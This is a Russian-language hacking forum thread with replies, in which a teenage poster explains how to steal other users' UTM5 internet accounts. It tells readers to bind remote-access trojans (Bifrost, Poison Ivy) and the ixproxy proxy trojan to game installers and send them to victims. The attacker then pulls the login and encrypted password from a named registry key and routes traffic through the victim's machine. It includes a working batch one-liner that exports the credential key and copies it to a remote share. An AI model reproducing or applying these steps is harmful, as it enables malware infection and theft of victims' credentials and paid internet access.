Привет, меня завут Rad0n, мне 14 лет,я тока начинающий хацкер, но кое-каких успехов уже добился . Инетом я как-то не очень увлекаюсь больше в сети... Тарифы у нас огромные и я решил намутить инет. Итак, способов халявного инета UTM, 2. 1). Ну канешно же трой, лично я юзаю back-connect, либо bifrost , либо poison ivy. У пойсона многа функций, но бифрост надежный. Так вот берем сервак бифроста(пойсона) клеим с чем нибуть(например с игрой) и расслылаем кто как может(на скока фантазии хватит), после того как у вас появилась жертва, ищем в его реестре: HKEY_CURRENT_USER\Software\NetUP\UTM5_wintray\Network\ там мы найдем логин и пасс, НО пасс зашифрованный, и ето лажа. Ну не долго думав я убедился в что создатели UTM полные лабаны, и зашифровали пасс по табличной системе(если кому нада, могу дать скриптик написанный мною). Юзаем скприпт и узнаем реальный пасс.. Затем есть 2 пути: 1)Создать копию Utm_wintray.exe и вбить туда данные жертвы. 2)Зайти в пункт управления аккаунтом, под акком жертвы, там же можно и узнать тарифф.... Затем юзаем файл менеджер в бифросте и кидаем жертве ixproxy.exe (проски трой, в инете не составит труда найти его, к таму же палится вроде, тока Norton и Symantec) и запускаем его(после запуска трой открывает порты 4280-сокс 4, 4282-http, и автоматически ставится в автозагрузку) Потом качаем с нета Hummingbird SOCKS(Он не очень удобен, но всеже самое лутшее, что я нашел, насчет socks_cap и прог таго же типа, прошу не возникать, не пашут, опробовано 200 раз ) Устанавливаем его, в процессе установки откроется окно с настройками, нажимаем сразу далее, и видим пустое поле, с кнопкой add, дальше разобраться не сложно(Но не ставьте галочку на Discable to pass.... , это отключит сокс) и поставьте галочку на socks 4, все можно жать финиш. Дальше остается открыть браузер, и инет готов, даже запустать нечего не нада, ну а для пущщей удобности можно запустить utm_wintray, под аккаунтом жертвы, чтобы контролировать его.. _____________________________________________ Итак Есть еще и 2 способ, он существенно побыстрее будет . Просим друга открыть папку с полным доступ и с $ на конце в названии(можно юзать и постоянные серваки, ну типа свалки или что то типа того, можно еще договориться с админом етого сервака чтобы он выделил для тебя папку ну кароче пофантазируйте). Ну так вот, Создаем *.bat, в него заносим: "reg export HKEY_CURRENT_USER\Software\NetUP\UTM5_wintray\Network\ c:\default2.txt|copy c:\default.txt \\"Ip друга"\"папка$"\|del c:\default.txt" Можно еще и @echo off в начале .. Берем ixproxy, и какую нибуть установку игры (или чего вы там хотите) и сам *.bat, всю эту кучу склеиваем и кидаю жертве, дальше все понятно, в default.txt на компе "друга", будет типо этого: Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\NetUP\UTM5_wintray\Network\] "Address"="192.168.1.11" "WebServerAddress"="192.168.1.11" "Port"=dword:00002dee "RefreshTime"=dword:00000078 "Login"="vasya" "Password"="9e9dc8c7c89d" Берем мой скрипт и по парам вводим в каждое окошко, в верхнем ряду пасс, потом generate... Затем заходим в html управление, вводим акк и пасс, и узнам айпи жертвы... Все, ну а дальше опять Hummingbird SOCKS.... Чтобы палить жертву можно просто пинговать и все... Чтобы убрать инет, придется удалять Hummingbird SOCKS, ну или опять заходить в установку и ставить галочку на Disbled, и Finish... Кстати Можно делать сразу несколько проксей в списке Hummingbird SOCKS, и ставить галочку на Balance(ета галачка делает так, чтобы если проски "упала" тока прога автоматов переключается на другую проксю...) Тут я читал, что типа проски в сети это на кароткое время, Но с функцией Balance(а можно и в ручную) инет практически круглосуточный.... Я к примеру качаю фильмы Кстати если не догадаетесь,как расшифровывается пасс то попросите сдесь же в теме у меня скрипт Ну вот и все, Удачи... Все это не откуда не спер, все придумал сам лично ... p.s хер знает почему, но все Network, почему-то с пробелом))), пробел не нада))))))
А если у нас в сети привязка по мак адресу? Тоесть даже зная пароль ты инетом не сможеш пользоваться. Что нить можеш сказать по этому поводу ? Заранее спасиб.
Вообще то данных в реестре может и не быть т.к. данные записываются как вы уже поняли программой UTMwinTray которой может и не быть установлено на компьютере жертвы. Присутствие её на компьютере не обязательно для выхода в интернет. p.s. молодец что смог подобрать алгоритм шифрования! у тебя будут успехи в криптографии. p.s. скинь если можешь мне алгоритм в ЛС.
у нас в сети тоже по МАС + порт, так не прокатывает... проще самому написать мими прокси и клеить с игрой, а там уже вот и интернет. Хотя выбор у каждого свой Один минус прокси;(